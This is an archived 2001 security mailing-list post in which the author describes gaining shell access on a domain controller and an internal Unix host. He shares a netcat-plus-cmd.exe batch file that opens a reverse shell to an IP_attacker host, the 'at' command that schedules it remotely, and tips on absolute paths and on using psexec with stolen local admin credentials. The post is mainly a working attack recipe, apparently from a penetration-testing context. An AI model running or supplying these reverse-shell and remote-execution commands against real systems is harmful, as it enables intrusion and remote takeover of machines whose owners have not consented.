Hello together, First of all, I got a lot of input from you guys, thanks for that. I have now shell access on the domain controller and with some tricks and brain work also telnet access on the main unix-system in their internal network. I think, that's a good finding :-) I want to give all of you a short summary of all the hints. If you are not interested, send this mail directly to /dev/null. Anyway, maybe some of you will find this helpful and here it comes: the content of my batch file was: c:\nc.exe IP_attacker port1_attacker | cmd.exe | nc.exe IP_attacker port2_attacker the command: at \\target time "c:\test.bat" Tipp 1.) use the absolute path in the batch - I'm stupied, but this was, in my case, the right solution. I typed the following and that worked fine: c:\nc.exe IP_attacker port1_attacker | cmd.exe | c:\nc.exe IP_attacker port2_attacker I forgot the c:\ in front of the second nc.exe. It is not necessary to use the absolute path for the cmd.exe, but for the nc.exe. Tipp 2.) don't use the quotes in the command - Well, I tried both, with and without quotes - same result Tipp 3.) use /interactive - same as above Tipp 4.) use the tool psexec - This tool is realy cool. If you can upload tools to a compromised system in the DMZ and you are able to execute it - this tool can solve a lot of your problems :-) But you need the username and the password (local admin). Thanks again for all your input. Regards Renato -- GMX - Die Kommunikationsplattform im Internet. http://www.gmx.net ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
This archive was generated by hypermail 2b30 : Thu Nov 15 2001 - 10:47:37 PST